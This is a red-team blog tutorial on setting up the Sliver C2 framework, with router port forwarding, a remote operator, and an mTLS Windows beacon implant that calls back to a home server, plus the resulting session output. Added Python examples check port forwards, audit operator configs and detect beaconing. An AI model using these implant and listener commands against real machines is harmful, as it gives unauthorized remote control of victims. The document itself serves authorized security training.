Introduction
In the world of cybersecurity, Red Team operations serve as one of the most effective ways to identify and test an organization's defenses. By simulating real-world attack scenarios, Red Teams help organizations understand their vulnerabilities before malicious actors can exploit them. In this blog post, we dive deep into the Sliver C2 framework — a highly capable and flexible tool that empowers Red Team professionals to simulate sophisticated cyber-attacks with ease.
Sliver, a modern and open-source Command and Control (C2) framework, is designed for efficient and stealthy penetration testing, making it an invaluable asset for both offensive security practitioners and organizations looking to enhance their defensive posture. This blog post will walk you through a complete Red Team operation utilizing Sliver C2, demonstrating how it can be leveraged for everything from initial access to lateral movement and post-exploitation activities.
We'll cover the fundamentals of setting up Sliver C2, exploring its advanced features, and providing a detailed walkthrough of a simulated attack scenario. Whether you're a seasoned Red Team operator or just getting started, this post will help you harness the full potential of Sliver in your offensive security arsenal. Let's dive into the world of Red Team operations with Sliver C2.
Setting up Sliver C2
For this project, I will be hosting the C2 server at home rather than using a Virtual Private Server with proxy chains and tunneling, which would be the ideal setup given the bad operational security of exposing one’s personal public IP as in this example… so kids, never try this at home!
First, we spin up a Linux server and give it a static IP. My preference is Kali, as it is built for this exact purpose (hacking).
Note: Feel free to google how to do the above as this is out of scope
Once this is done, we download the server binary from the BishopFox GitHub releases page: https://github.com/BishopFox/sliver/releases
chmod +x sliver-server_linux
./sliver-server_linux
output below:
┌──(maine㉿offsec)-[~/Downloads]
└─$ ./sliver-server_linux
Sliver Copyright (C) 2022 Bishop Fox
This program comes with ABSOLUTELY NO WARRANTY; for details type 'licenses'.
This is free software, and you are welcome to redistribute it
under certain conditions; type 'licenses' for details.
Unpacking assets ...
[*] Loaded 21 aliases from disk
[*] Loaded 141 extension(s) from disk
██████ ██▓ ██▓ ██▒ █▓▓█████ ██▀███
▒██ ▒ ▓██▒ ▓██▒▓██░ █▒▓█ ▀ ▓██ ▒ ██▒
░ ▓██▄ ▒██░ ▒██▒ ▓██ █▒░▒███ ▓██ ░▄█ ▒
▒ ██▒▒██░ ░██░ ▒██ █░░▒▓█ ▄ ▒██▀▀█▄
▒██████▒▒░██████▒░██░ ▒▀█░ ░▒████▒░██▓ ▒██▒
▒ ▒▓▒ ▒ ░░ ▒░▓ ░░▓ ░ ▐░ ░░ ▒░ ░░ ▒▓ ░▒▓░
░ ░▒ ░ ░░ ░ ▒ ░ ▒ ░ ░ ░░ ░ ░ ░ ░▒ ░ ▒░
░ ░ ░ ░ ░ ▒ ░ ░░ ░ ░░ ░
░ ░ ░ ░ ░ ░ ░ ░
All hackers gain dash
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options
[*] Check for updates with the 'update' command
[server] sliver >
It is important that we run the server binary, since operators are created on the server. If your prompt does not show [server] sliver >, you have started the client instead of the server; it will still work against an existing server, but the multiplayer and new-operator commands only exist in the server console.
Alternatively, on Kali we can simply type sliver-server in the terminal; if the package is not installed yet, Kali offers to install it and we enter “y” for yes.
Next, we set up port forwarding on the router. Routers all differ, so be sure to google how to do port forwarding on your own model.
I have forwarded <myPublicIP>:4040 to 192.168.1.101:4040. To make sure it works, we listen on port 4040 locally on 192.168.1.101, our Kali machine, the one hosting the Sliver C2 server.
Note: feel free to google how to do the above as this is out of scope
Tip: check your own public IP by googling “what’s my ip”.
We enter the following command on our Kali machine:
nc -lvnp 4040
From any other device, ideally one outside our network, we scan our public IP to see whether port 4040 is open:
nmap -A -p4040 -vv <mypublicip>
We should see the connection arrive on the nc listener; that is the validation that the port forwarding works. nmap reporting the port as open only tells us something answered on the router side, so the nc side is the check that matters.
Do the same for port 31337, the default port of the multiplayer (operator) listener, and for one more port of your choice, which will serve the stagers at a later stage.
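The nc plus nmap check above tells us a port looks open, but not that the connection we see on Kali is the one we sent. The following is an added example (my own code, not from the post or from Sliver) that does the same validation with a one-time token: the listener only reports success if the probe’s token arrives. Both ends run on 127.0.0.1 here so it works offline; for the real check, run listen_for_token() on the Kali box bound to 192.168.1.101 and probe() from a device outside the network against the public IP. Host names, ports and the token format are my assumptions.

```python
"""Validate a port forward end to end with a nonce (added example, not from the post)."""
import secrets
import socket
import threading


def free_port():
    """Ask the OS for an unused TCP port (only needed for the offline loopback demo)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def listen_for_token(bind_host, port, token, ready=None, timeout=10.0):
    """Accept one connection on bind_host:port and report whether it carried `token`.

    Plays the role of `nc -lvnp 4040` on the C2 host, but a bare connect is not
    enough: the peer has to deliver the secret we handed to the probe.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind_host, port))
        srv.listen(1)
        srv.settimeout(timeout)
        if ready is not None:
            ready.set()  # tell the caller the socket is bound and listening
        try:
            conn, _peer = srv.accept()
        except socket.timeout:
            return False  # nothing reached us: forwarding or firewall problem
        with conn:
            conn.settimeout(timeout)
            data = conn.recv(256)
    return data.strip() == token.encode()


def probe(target_host, port, token, timeout=5.0):
    """Connect to target_host:port (the public IP when run from outside) and send the token."""
    try:
        with socket.create_connection((target_host, port), timeout=timeout) as s:
            s.sendall(token.encode() + b"\n")
        return True
    except OSError:
        return False  # refused, filtered or timed out


def check_port_forward(bind_host, target_host, port):
    """Run both ends and return True only if the probe's token reached the listener."""
    token = secrets.token_hex(8)
    ready = threading.Event()
    outcome = {}

    def listener():
        outcome["seen"] = listen_for_token(bind_host, port, token, ready)

    t = threading.Thread(target=listener, daemon=True)
    t.start()
    ready.wait(5.0)
    connected = probe(target_host, port, token)
    t.join(15.0)
    return connected and outcome.get("seen", False)


if __name__ == "__main__":
    demo_port = free_port()
    print("loopback check on port", demo_port, "->",
          check_port_forward("127.0.0.1", "127.0.0.1", demo_port))
```

Repeat the check for 31337 and the stager port; a forward that is configured but not reachable shows up as False on the listener side rather than as a confusing nmap state.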
Hooray !!! we celebrate a bit ….
Now we know that our implants can call back to the C2 server. Let’s set up an operator so we can access the server remotely…
Go ahead and enter multiplayer in the Sliver server console:
[server] sliver > multiplayer
[*] Multiplayer mode enabled!
Now we create an operator; -l is the address the operator’s client will connect to, so it has to be the public IP, not the LAN one:
[server] sliver > new-operator -l <mypublicIp> -n maine
This writes the operator’s cfg file. Share it with the right person only, and over a secure channel: it contains that operator’s client certificate and private key, and anyone holding it can log into the C2 server as that operator.
Tip: feel free to consult the help menu of every command with help <command> or <command> --help.
Though the whole operation can be conducted from the server console, we also want to take advantage of being able to connect to our C2 server from anywhere in the world.
On the operator machine, repeat the setup steps above for sliver-client instead of sliver-server; alternatively, on Kali, just type sliver-client in the terminal and enter “y” for yes, which installs the client.
To use our newly created access to the Sliver C2 server, we enter one of the following commands:
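Before handing the cfg over, it is worth checking two things the post glosses over: that the lhost inside it is actually reachable from the internet (a LAN address here means the remote operator can never connect), and that the file is not world-readable, since it carries the operator’s private key. The following is an added example (my own code, not from the post or from Sliver) that audits a cfg and locks down its permissions. The JSON field names (operator, lhost, lport, token, ca_certificate, private_key, certificate) are my assumption about the shape of Sliver’s client config; the sample itself is constructed and its PEM bodies are placeholders, not real key material.

```python
"""Audit and lock down a Sliver operator cfg (added example, not from the post)."""
import ipaddress
import json
import os
import stat
import tempfile

# Constructed sample in the assumed shape of an operator config. The lhost is the
# post's LAN address on purpose, to show the mistake the audit is meant to catch.
SAMPLE_CFG = {
    "operator": "maine",
    "lhost": "192.168.1.101",
    "lport": 31337,
    "token": "0123456789abcdef",
    "ca_certificate": "-----BEGIN CERTIFICATE-----\nplaceholder\n-----END CERTIFICATE-----\n",
    "private_key": "-----BEGIN EC PRIVATE KEY-----\nplaceholder\n-----END EC PRIVATE KEY-----\n",
    "certificate": "-----BEGIN CERTIFICATE-----\nplaceholder\n-----END CERTIFICATE-----\n",
}

REQUIRED = ("operator", "lhost", "lport", "token", "ca_certificate", "private_key", "certificate")


def audit_config(cfg):
    """Return a list of findings for an operator config dict (empty list = looks sane)."""
    findings = []
    for key in REQUIRED:
        if not cfg.get(key):
            findings.append(f"missing field: {key}")
    if findings:
        return findings
    try:
        addr = ipaddress.ip_address(cfg["lhost"])
        if not addr.is_global:  # RFC1918, loopback, link-local: unreachable from outside
            findings.append(f"lhost {cfg['lhost']} is not a public address; "
                            "new-operator -l must be the IP or DNS name the operator will reach")
    except ValueError:
        pass  # a DNS name rather than an IP: nothing to check offline
    if not 1 <= int(cfg["lport"]) <= 65535:
        findings.append(f"lport {cfg['lport']} out of range")
    if "PRIVATE KEY" not in cfg["private_key"]:
        findings.append("private_key does not look like a PEM private key")
    return findings


def harden_permissions(path):
    """Restrict the cfg to owner read/write and return the resulting mode bits (0o600)."""
    os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
    return stat.S_IMODE(os.stat(path).st_mode)


def load_and_check(path):
    """Load a cfg from disk; return (findings, mode) after locking the file down."""
    with open(path) as fh:
        cfg = json.load(fh)
    return audit_config(cfg), harden_permissions(path)


def demo_on_temp_file():
    """Write the constructed sample to a temp file, audit it and lock down its mode."""
    fd, path = tempfile.mkstemp(suffix=".cfg")
    with os.fdopen(fd, "w") as fh:
        json.dump(SAMPLE_CFG, fh)
    try:
        return load_and_check(path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    findings, mode = demo_on_temp_file()
    print(f"mode={mode:o}")
    for f in findings:
        print("[!]", f)
```

Run load_and_check() against the real file the server produced (and again on the operator’s side after import, the client copies it under ~/.sliver-client/configs/); an empty findings list plus mode 600 is what you want before the operator goes anywhere near the internet with it.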
sliver-client import maine.cfg
OR
./sliver-client import maine.cfg
OR
sliver import maine.cfg
Tip: feel free to consult the help menu with sliver-client -h or sliver -h.
So I did the following:
┌──(maine㉿offsec)-[~/Downloads]
└─$ sliver-client import maine.cfg
2025/01/03 21:40:35 Saved new client config to: /home/maine/.sliver-client/configs/maine.cfg
We can now run sliver, sliver-client or ./sliver-client again and select the right operator name for the right IP.
output:
.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\\: || :/\\: || (\\/) || :(): || (\\/) || :(): |
| :\\/: || (__) || :\\/: || ()() || :\\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'
All hackers gain reinforce
[*] Server v1.5.42 - kali
[*] Client v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options
[*] Check for updates with the 'update' command
sliver >
Tada !!! we can now access our Sliver C2 Server from anywhere in the world.
***** we celebrate a bit*****
First Beacon - Case of Windows 10
The server setup is done; we should now test whether an implant can get back to us. For this, we will use a Windows 10 machine as the victim.
We disable all antivirus and tamper protection on it, since this first implant has no evasion at all. Let’s generate a quick implant and send it over to the victim.
sliver > generate beacon --mtls <mypublicip>:4040 --os windows --arch amd64 --format exe --seconds 5 --jitter 3
[*] Generating new windows/amd64 beacon implant binary (5s)
[*] Symbol obfuscation is enabled
[*] Build completed in 26s
[*] Implant saved to /home/maine/Downloads/RICH_BRUSH.exe
where:
- --seconds: beacon interval seconds (default: 60)
- --jitter: beacon interval jitter in seconds (default: 30)
- --mtls: mutual TLS, followed by the host:port the implant calls back to
It’s worth noting that implants are compiled on the server, not on the client, so we should make sure our server is powerful enough to handle several operators building payloads at the same time without falling over.
We start a listener on the same port we forwarded and passed to --mtls; it must be running before the implant is executed on the victim:
sliver > mtls -l 4040
[*] Starting mTLS listener ...
[*] Successfully started job #2
The victim executes the payload, and BOOOMMMM!!! here we go, we got a beacon working!!!! A call back!!! A shell!!!!!!!
[*] Beacon c46b2b6e RICH_BRUSH - IP:PORT (DESKTOP-DUQ8TTD) - windows/amd64 - Fri, 03 Jan 2025 22:05:16 SAST
sliver >
celebrate, celebrate celebrate !!!!!!!!!!!!!!!!
Interact with a Beacon
We now have access to the victim computer remotely over the internet. We can list our beacons by entering beacons:
sliver > beacons
ID Name Tasks Transport Remote Address Hostname Username Operating System Locale Last Check-In Next Check-In
========== ============ ======= =========== ==================== ================= ========== ================== ======== ============================================ ============================================
c46b2b6e RICH_BRUSH 0/0 mtls sniiiiiiiiiiiiiiip DESKTOP-DUQ8TTD me windows/amd64 en-US Fri Jan 3 22:08:50 SAST 2025 (13m20s ago) Fri Jan 3 22:08:55 SAST 2025 (13m15s ago)
sliver >
We then use the command use <ID> to interact with the beacon:
sliver > use c46b2b6e
[*] Active beacon RICH_BRUSH (c46b2b6e-f408-4829-8899-64472c646b57)
sliver (RICH_BRUSH) >
sliver (RICH_BRUSH) > info
Beacon ID: c46b2b6e-f408-4829-8899-64472c646b57
Name: RICH_BRUSH
Hostname: DESKTOP-DUQ8TTD
UUID: 52384d56-7437-0384-131a-4e4d1ede2a45
Username: DESKTOP-DUQ8TTD\\me
UID: S-1-5-21-2574036656-4060413577-2053307646-1001
GID: S-1-5-21-2574036656-4060413577-2053307646-513
PID: 1332
OS: windows
Version: 10 build 19045 x86_64
Locale: en-US
Arch: amd64
Active C2: mtls://Snip:4040
Remote Address: snip:25685
Proxy URL:
Interval: 5s
Jitter: 3s
First Contact: Fri Jan 3 22:05:38 SAST 2025 (27m1s ago)
Last Checkin: Fri Jan 3 22:08:50 SAST 2025 (23m49s ago)
Next Checkin: Fri Jan 3 22:08:55 SAST 2025 (23m44s ago)
We notice that commands take a while before returning any output. This is normal in beacon mode: the command is queued as a task and the implant only picks it up at its next check-in, which is at most interval plus jitter away (5 to 8 seconds with our settings). To move from beacon mode to a live session, where there is no such delay, we enter the command:
sliver (RICH_BRUSH) > interactive
[*] Using beacon's active C2 endpoint: mtls://SNIP:4040
[*] Tasked beacon RICH_BRUSH (75f51ba0)
[*] Session 1f07c18c RICH_BRUSH - SNIP:30780 (DESKTOP-DUQ8TTD) - windows/amd64 - Fri, 03 Jan 2025 22:46:36 SAST
sliver (RICH_BRUSH) > background
[*] Background ...
A session has been created; now we check the sessions as follows:
sliver > sessions
ID Name Transport Remote Address Hostname Username Operating System Locale Last Message Health
========== ============ =========== ==================== ================= ========== ================== ======== ======================================= =========
1f07c18c RICH_BRUSH mtls Sniiiiiiiiiipppppp DESKTOP-DUQ8TTD me windows/amd64 en-US Fri Jan 3 22:46:59 SAST 2025 (in 7s) [ALIVE]
We interact with the session just like we did with the beacon, with use <session ID>:
sliver > use 1f07c18c
[*] Active session RICH_BRUSH (1f07c18c-aa49-42a6-9d8c-3a57050493eb)
sliver (RICH_BRUSH) >
We notice right away that RICH_BRUSH turned red, indicating that we are in session mode. Now we have a live shell with instant output…
Enter close to end the session:
sliver (RICH_BRUSH) > close
[!] Lost session 1f07c18c RICH_BRUSH - (DESKTOP-DUQ8TTD) - windows/amd64 - Fri, 03 Jan 2025 22:51:23 SAST
[!] Active session disconnected
sliver >
Do not worry, we close the session, not the beacon :)
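The --seconds and --jitter options chosen at generate time decide both how long we wait for task output in beacon mode and how loud the implant is on the wire. The following is an added example (my own code, not from the post or from Sliver) that works the timing through: it computes the check-in window for a given interval and jitter, simulates check-ins scheduled that way, and then looks at the same timestamps the way a defender would, by measuring how regular the inter-arrival gaps are. It assumes Sliver schedules the next check-in as interval plus a random 0..jitter seconds, which is how I read the beacon code and which matches the 5 s gap between Last Checkin and Next Checkin in the info output above; the timestamps are constructed, seeded by the post’s first-contact time.

```python
"""Beacon interval/jitter arithmetic and a simple beaconing detector (added example)."""
import random
import statistics
from datetime import datetime, timedelta

# First Contact time from the post's `info` output, used as a start point for the samples.
PAGE_FIRST_CONTACT = datetime(2025, 1, 3, 22, 5, 38)


def checkin_window(interval_s, jitter_s):
    """(earliest, latest) seconds until the next check-in: interval plus 0..jitter (assumption)."""
    return interval_s, interval_s + jitter_s


def expected_connections_per_hour(interval_s, jitter_s):
    """Average callbacks per hour, using the mean gap interval + jitter/2."""
    return 3600.0 / (interval_s + jitter_s / 2.0)


def simulate_checkins(start, interval_s, jitter_s, count, seed=7):
    """Timestamps of `count` check-ins scheduled like the beacon would (constructed data)."""
    rng = random.Random(seed)
    times = [start]
    for _ in range(count - 1):
        times.append(times[-1] + timedelta(seconds=interval_s + rng.random() * jitter_s))
    return times


def simulate_human_traffic(start, mean_gap_s, count, seed=7):
    """Timestamps with exponentially distributed gaps, a rough stand-in for a user browsing."""
    rng = random.Random(seed)
    times = [start]
    for _ in range(count - 1):
        times.append(times[-1] + timedelta(seconds=rng.expovariate(1.0 / mean_gap_s)))
    return times


def interarrival_stats(timestamps):
    """Return (median gap in seconds, coefficient of variation of the gaps)."""
    gaps = [(b - a).total_seconds() for a, b in zip(timestamps, timestamps[1:])]
    mean = statistics.mean(gaps)
    return statistics.median(gaps), statistics.pstdev(gaps) / mean


def looks_like_beacon(timestamps, max_cv=0.3, min_events=10):
    """Defender-side view: very regular gaps from one host to one destination are beacon-like.

    A uniform jitter of j on an interval i gives a coefficient of variation of
    (j / sqrt(12)) / (i + j / 2), so even the 60/30 defaults sit around 0.12.
    """
    if len(timestamps) < min_events:
        return False
    _, cv = interarrival_stats(timestamps)
    return cv <= max_cv


if __name__ == "__main__":
    for interval, jitter in ((5, 3), (60, 30)):
        window = checkin_window(interval, jitter)
        sample = simulate_checkins(PAGE_FIRST_CONTACT, interval, jitter, 60)
        med, cv = interarrival_stats(sample)
        print(f"interval={interval}s jitter={jitter}s window={window} "
              f"~{expected_connections_per_hour(interval, jitter):.0f}/h "
              f"median_gap={med:.1f}s cv={cv:.2f} beacon_like={looks_like_beacon(sample)}")
    human = simulate_human_traffic(PAGE_FIRST_CONTACT, 30, 60)
    print("human-like traffic beacon_like =", looks_like_beacon(human))
```

With the post’s 5 s interval the implant makes roughly 550 connections an hour, which is fine for a lab but is exactly the kind of regular callback a network monitor flags; a long interval with a jitter larger than the interval is what pushes the coefficient of variation up and makes the detector above lose its grip.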
Unlike Cobalt Strike or even Havoc, Sliver C2 does not do much for evasion beyond symbol obfuscation; on the other hand, we can generate shellcode from Sliver and build our own loader around it, which we can then write to evade antivirus and EDRs, and introduce stagers on the fly. This is the main reason I did not cover payload delivery in this post: evasion has to be discussed first.
That being said, next in the Sliver C2 Complete Red Team Operation over WAN series, we will have a look at antivirus evasion.
Feel free to comment any questions below !